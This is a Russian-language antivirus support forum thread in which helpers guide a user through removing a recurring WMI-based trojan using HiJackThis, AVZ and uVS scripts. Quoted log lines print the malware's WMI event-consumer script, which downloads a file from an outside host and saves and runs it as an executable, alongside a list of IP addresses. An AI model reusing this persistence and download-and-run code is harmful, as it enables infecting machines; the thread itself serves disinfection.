trojan.multi.wmi run.a

[m0nster]

Помогите уничтожить. Касперский находит, лечит, при перезагрузке появляется опять.

Помогите уничтожить. Касперский находит, лечит, при перезагрузке появляется опять.

CollectionLog-2018.10.30-07.41.zip

[SQ]

Здравствуйте,

Сообщите пожалуйста, у Вас что прямой доступ к интернету? У Вас Firewall работает? Если работает закрывали ли порты SMB?

HiJackThis (из каталога autologger)профиксить
Важно: необходимо отметить и профиксить только то, что указано ниже.

O4 - MSConfig\startupreg: BGClients [command] = C:\Windows\system32\cmd.exe /c start /min c:\windows\system32\wbem\123.bat (HKLM) (2018/10/29)
O22 - Task: (disabled) ok - C:\Windows\system32\rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa
O25 - WMI Event: fuckyoumm2_consumer - fuckyoumm2_filter - var x = new ActiveXObject("Microsoft.XMLHTTP");x.Open("GET", "http://down.mys2018.xyz:280/psa.jpg",0);x.Send();var s = new ActiveXObject("ADODB.Stream");s.Mode = 3;s.Type = 1;s.Open();s.Write(x.responseBody);s.SaveToFile("C:\\\\WINDOWS\\\\ps.exe",2);var r = new ActiveXObject("WScript.Shell.1");r.Run(328 bytes)
O25 - WMI Event: fuckyoumm_consumer - fuckyoumm_filter - var toff=3000;var fso=new ActiveXObject("Scripting.FilesystemObject");var http=new ActiveXObject("Msxml2.ServerXMLHTTP");if(!fso.FileExists('wpd.xml')){var f=fso.CreateTextFile('wpd.xml',2);f.writeLine('54.255.141.50'+'\r\n'+'78.142.29.152'+'\r\n'+'74.222.14.61'+'\r\n'+'70.39.124.66');f.Close();}var(2698 bytes)

AVZ выполнить следующий скрипт.
Важно на ОС: Windows Vista/7/8/8.1 AVZ запускайте через контекстное меню проводника от имени Администратора.

begin
ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.'+#13#10+'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.');
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
 then
  begin
   SearchRootkit(true, true);
   SetAVZGuardStatus(True);
  end;
 QuarantineFile('c:\windows\debug\ok.dat','');
 QuarantineFile('c:\windows\system32\wbem\123.bat','');
 RegKeyDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\BGClients','x32');
 DeleteFile('c:\windows\system32\wbem\123.bat','32');
 DeleteFile('c:\windows\debug\ok.dat','32');
 DeleteSchedulerTask('ok');
BC_ImportAll;
ExecuteSysClean;
BC_Activate;
RebootWindows(true);
end.

После выполнения скрипта компьютер перезагрузится.

После перезагрузки:
- Выполните в AVZ:

begin
 CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
end.

quarantine.zip из папки AVZ загрузите этот архив через данную форму

- Подготовьте лог AdwCleaner и приложите его в теме.

Похоже экплуатируют уязвимость SMB, сообщите если вы установили обновления для Windows 7 x86:
KB4012212
KB4012215
 

[m0nster]

 

Все сдела, Не помогло. ПК стоит за роутером, в котором открыт только порт SQL. Обновления вроде устанавливаются автоматом.

 

В HiJackThis у меня нет пунктов 025.

[SQ]

В HiJackThis у меня нет пунктов 025.

Использовали HiJackThis из каталога автологера?

[m0nster]

Конечно.

 

AdwCleanerS03.txt

Изменено 30 октября, 2018 пользователем m0nster

[SQ]

Если Вы точно не скачивали HiJackThis по ссылки, а использоватили из каталога автологгера, то приложите новые логи по правилам.

Вы кстате замечали, что один из дисков дает сбои возможно он сыпится, по крайней мере записываются события об этом в логах.
 

Имя компьютера: base
Код события: 11
Сообщение: Драйвер обнаружил ошибку контроллера \Device\Harddisk1\DR1.
Номер записи: 207174
Источник: Disk
Время записи: 20181030041104.952148-000
Тип события: Ошибка
Пользователь: 

Имя компьютера: base
Код события: 11
Сообщение: Драйвер обнаружил ошибку контроллера \Device\Harddisk1\DR1.
Номер записи: 207173
Источник: Disk
Время записи: 20181030041103.452148-000
Тип события: Ошибка
Пользователь: 

Имя компьютера: base
Код события: 11
Сообщение: Драйвер обнаружил ошибку контроллера \Device\Harddisk1\DR1.
Номер записи: 207172
Источник: Disk
Время записи: 20181030041102.952148-000
Тип события: Ошибка
Пользователь: 
====== Журнал событий "Приложения" ======

ПК стоит за роутером, в котором открыт только порт SQL.

Роутер случайно не Mikrotik?

[m0nster]

 

Нет. F@ST1704N от Ростелекома.

CollectionLog-2018.10.30-08.44.zip

[SQ]

Прверьте еще раз в HiJackThis из каталога автологера, там должны быть эти строки:

 

O25 - WMI Event: fuckyoumm2_consumer - fuckyoumm2_filter - var x = new ActiveXObject("Microsoft.XMLHTTP");x.Open("GET", "http://down.mys2018.xyz:280/psa.jpg",0);x.Send();var s = new ActiveXObject("ADODB.Stream");s.Mode = 3;s.Type = 1;s.Open();s.Write(x.responseBody);s.SaveToFile("C:\\\\WINDOWS\\\\ps.exe",2);var r = new ActiveXObject("WScript.Shell.1");r.Run(328 bytes)
O25 - WMI Event: fuckyoumm_consumer - fuckyoumm_filter - var toff=3000;var fso=new ActiveXObject("Scripting.FilesystemObject");var http=new ActiveXObject("Msxml2.ServerXMLHTTP");if(!fso.FileExists('wpd.xml')){var f=fso.CreateTextFile('wpd.xml',2);f.writeLine('54.255.141.50'+'\r\n'+'78.142.29.152'+'\r\n'+'74.222.14.61'+'\r\n'+'70.39.124.66');f.Close();}var(2698 bytes)

P.S. По крайней мере в логах которые вы прислали они присутствуют, не может быть, чтобы они были только в логах.

 

Нет. F@ST1704N от Ростелекома.

Он у Вас не настроен в режиме моста (bridge)?

[m0nster]

После простоя пару часов во включенном состоянии (без доступа в сеть) появились все вирусы снова. Сделал лог.

Модем в роутере, открыт только SQL порт. 025 удалил.

CollectionLog-2018.10.30-13.31.zip

Изменено 30 октября, 2018 пользователем m0nster

[SQ]

Насколько видно, вы не профиксили записи 025 в HiJackThis.

Скачайте программу Universal Virus Sniffer и сделайте полный образ автозапуска uVS.

 

[m0nster]

Насколько видно, вы не профиксили записи 025 в HiJackThis.

 

Скачайте программу Universal Virus Sniffer и сделайте полный образ автозапуска uVS.

 

 

После перезапуска 025 пункты возвуращаються!

BASE_2018-10-30_16-08-05_v4.1.1.7z

Изменено 30 октября, 2018 пользователем m0nster

[regist]

В HiJackThis у меня нет пунктов 025.

сделайте скрин окна, чтобы было видно в чём вы пытаетесь фиксить и что их нет.

[m0nster]

сделайте скрин окна, чтобы было видно в чём вы пытаетесь фиксить и что их нет.

[SQ]

Выполните скрипт в uVS:

;uVS v4.0.11 [http://dsrt.dyndns.org]
;Target OS: NTv6.1
v400c
OFFSGNSAVE
BREG
zoo %SystemDrive%\PROGRAMDATA\DESKEYG.EXE
delref %Sys32%\DRIVERS\37346692.SYS
delref %Sys32%\DRIVERS\44689483.SYS
delref %Sys32%\DRIVERS\56324358.SYS
delref WMI_ACTIVESCRIPTEVENTCONSUMER\FUCKYOUMM2_CONSUMER.[FUCKYOUMM2_FILTER]
delref WMI_ACTIVESCRIPTEVENTCONSUMER\FUCKYOUMM_CONSUMER.[FUCKYOUMM_FILTER]
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.32.7\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.33.3\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.33.5\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.33.7\PSMACHINE.DLL
restart

каталог zoo заархивируйте в zoo.zip и  загрузите этот архив через данную форму
 

[m0nster]

Отправил. Проблема осталась